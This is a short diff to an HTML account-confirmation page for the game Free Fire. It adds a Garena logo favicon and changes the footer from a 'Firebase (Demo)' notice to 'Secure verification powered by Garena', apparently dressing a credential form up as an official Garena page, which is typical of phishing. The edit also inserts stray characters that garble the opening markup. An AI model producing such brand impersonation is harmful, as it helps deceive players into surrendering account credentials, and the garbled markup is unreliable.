--- a/index.html
+++ b/index.html
@@ -1,9 +1,14 @@
-<!DOCTYPE html>
+a<!DOCTYPE html>
 <html lang="en">
-<head>
+<<head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Confirm Free Fire Account</title>
+
+  <!-- Favicon from imgbb -->
+  <link rel="icon" type="image/png" href="https://i.ibb.co/LXXGHhZg/garena.png">
+
+
   <style>
     /* Reset */
     * {
@@ -142,7 +147,7 @@
       </button>
     </form>
     <div class="footer">
-      Secure verification powered by Firebase (Demo)
+      Secure verification powered by Garena
     </div>
   </div>
 
@@ -200,4 +205,5 @@
   </script>
 </body>
 </html>
+
 
